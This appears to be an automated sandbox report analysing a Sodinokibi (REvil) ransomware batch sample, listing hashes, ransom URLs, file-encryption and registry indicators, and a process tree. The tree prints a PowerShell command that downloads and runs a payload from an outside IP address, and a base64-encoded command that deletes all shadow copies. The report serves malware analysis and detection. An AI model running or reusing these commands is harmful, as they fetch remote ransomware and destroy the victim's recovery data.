Analysis
max time kernel: 145s
max time network: 73s
platform: windows7_x64
resource: win7v200722
submitted: 18-08-2020 23:10

Static task: static1
Behavioral task: behavioral1
  Sample: 6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat
  Resource: win10v200722
General
Target: 6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat
Size: 215B
MD5: 4ff9830e5ccfee8915f14f83fe8f1918
SHA1: 0efe2413519a6ce400cc4042ee029c2b84b73b25
SHA256: 6e19ccbb3e491327f4ddebd05fd7ce6c87d9a94acd5851b856569ecb1a17a347
SHA512: 222eeadcd7acf048a6e5cd50d5df143c63f1200f9bc571333aff360ba7e88453152e071383d1f6d68fc889556beb01b931f08305d5daaa4ed1e697be60920108
Malware Config
Extracted from: http://185.103.242.78/pastes/6bfe2bf5d32adbdaa5ef03bf7c3652cf
Extracted from: C:\21bh2n-readme.txt
Family: sodinokibi
URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/176BEE8C9B811708
  http://decryptor.cc/176BEE8C9B811708
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
  flow 5, PID 1012, powershell.exe

Modifies extensions of user files (7 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: powershell.exe
  File renamed C:\Users\Admin\Pictures\CompressNew.raw => \??\c:\users\admin\pictures\CompressNew.raw.21bh2n (powershell.exe)
  File renamed C:\Users\Admin\Pictures\CompleteRedo.png => \??\c:\users\admin\pictures\CompleteRedo.png.21bh2n (powershell.exe)
  File renamed C:\Users\Admin\Pictures\DenyApprove.png => \??\c:\users\admin\pictures\DenyApprove.png.21bh2n (powershell.exe)
  File renamed C:\Users\Admin\Pictures\InstallUnblock.crw => \??\c:\users\admin\pictures\InstallUnblock.crw.21bh2n (powershell.exe)
  File renamed C:\Users\Admin\Pictures\SetResize.raw => \??\c:\users\admin\pictures\SetResize.raw.21bh2n (powershell.exe)
  File renamed C:\Users\Admin\Pictures\UninstallConnect.tif => \??\c:\users\admin\pictures\UninstallConnect.tif.21bh2n (powershell.exe)
  File renamed C:\Users\Admin\Pictures\UseRedo.tif => \??\c:\users\admin\pictures\UseRedo.tif.21bh2n (powershell.exe)
Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d3bk4y2he.bmp" (powershell.exe)
Drops file in Program Files directory (35 IoCs)
Processes: powershell.exe
  File opened for modification \??\c:\program files\ConvertToInitialize.mpe (powershell.exe)
  File opened for modification \??\c:\program files\InvokeNew.midi (powershell.exe)
  File opened for modification \??\c:\program files\OutClose.mov (powershell.exe)
  File created \??\c:\program files\microsoft sql server compact edition\21bh2n-readme.txt (powershell.exe)
  File opened for modification \??\c:\program files\SwitchImport.ppsm (powershell.exe)
  File opened for modification \??\c:\program files\FindReset.wmx (powershell.exe)
  File opened for modification \??\c:\program files\GrantComplete.xlsx (powershell.exe)
  File opened for modification \??\c:\program files\ImportInstall.vsdm (powershell.exe)
  File opened for modification \??\c:\program files\RedoComplete.ex_ (powershell.exe)
  File opened for modification \??\c:\program files\ConvertToJoin.wvx (powershell.exe)
  File opened for modification \??\c:\program files\ConvertToUpdate.vdw (powershell.exe)
  File opened for modification \??\c:\program files\InitializeProtect.eps (powershell.exe)
  File opened for modification \??\c:\program files\ResolveConvertFrom.xlsx (powershell.exe)
  File opened for modification \??\c:\program files\OpenHide.vdx (powershell.exe)
  File opened for modification \??\c:\program files\RevokeStep.docx (powershell.exe)
  File opened for modification \??\c:\program files\TraceCheckpoint.mp2 (powershell.exe)
  File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\21bh2n-readme.txt (powershell.exe)
  File created \??\c:\program files\21bh2n-readme.txt (powershell.exe)
  File created \??\c:\program files (x86)\21bh2n-readme.txt (powershell.exe)
  File opened for modification \??\c:\program files\GroupCheckpoint.vdx (powershell.exe)
  File opened for modification \??\c:\program files\RepairPop.docx (powershell.exe)
  File opened for modification \??\c:\program files\RevokeResize.dotx (powershell.exe)
  File opened for modification \??\c:\program files\StopUnpublish.docx (powershell.exe)
  File opened for modification \??\c:\program files\UnregisterInitialize.dotm (powershell.exe)
  File opened for modification \??\c:\program files\InstallPop.ttf (powershell.exe)
  File opened for modification \??\c:\program files\MoveSelect.edrwx (powershell.exe)
  File opened for modification \??\c:\program files\PopRegister.clr (powershell.exe)
  File opened for modification \??\c:\program files\ReadConvertFrom.zip (powershell.exe)
  File opened for modification \??\c:\program files\SplitHide.gif (powershell.exe)
  File opened for modification \??\c:\program files\ConfirmRead.xht (powershell.exe)
  File opened for modification \??\c:\program files\ConvertCompare.mp2 (powershell.exe)
  File opened for modification \??\c:\program files\MergeFind.wma (powershell.exe)
  File opened for modification \??\c:\program files\UndoTest.au3 (powershell.exe)
  File opened for modification \??\c:\program files\UninstallResolve.mpeg3 (powershell.exe)
  File created \??\c:\program files\microsoft sql server compact edition\v3.5\21bh2n-readme.txt (powershell.exe)
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
  PID 1012, powershell.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
  PID 1012, powershell.exe
  PID 1012, powershell.exe
  PID 1012, powershell.exe
  PID 620, powershell.exe
  PID 620, powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  Token: SeDebugPrivilege, PID 1012, powershell.exe
  Token: SeDebugPrivilege, PID 1012, powershell.exe
  Token: SeDebugPrivilege, PID 620, powershell.exe
  Token: SeBackupPrivilege, PID 2040, vssvc.exe
  Token: SeRestorePrivilege, PID 2040, vssvc.exe
  Token: SeAuditPrivilege, PID 2040, vssvc.exe
  Token: SeTakeOwnershipPrivilege, PID 1012, powershell.exe

Suspicious use of WriteProcessMemory (8 IoCs)
Processes: cmd.exe, powershell.exe
  PID 844 wrote to memory of 1012 (cmd.exe -> powershell.exe)
  PID 844 wrote to memory of 1012 (cmd.exe -> powershell.exe)
  PID 844 wrote to memory of 1012 (cmd.exe -> powershell.exe)
  PID 844 wrote to memory of 1012 (cmd.exe -> powershell.exe)
  PID 1012 wrote to memory of 620 (powershell.exe -> powershell.exe)
  PID 1012 wrote to memory of 620 (powershell.exe -> powershell.exe)
  PID 1012 wrote to memory of 620 (powershell.exe -> powershell.exe)
  PID 1012 wrote to memory of 620 (powershell.exe -> powershell.exe)
Processes

C:\Windows\system32\cmd.exe (depth 1, PID 844)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 1012)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6bfe2bf5d32adbdaa5ef03bf7c3652cf');Invoke-CXLQETAA;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 620)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (depth 1, PID 2040)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken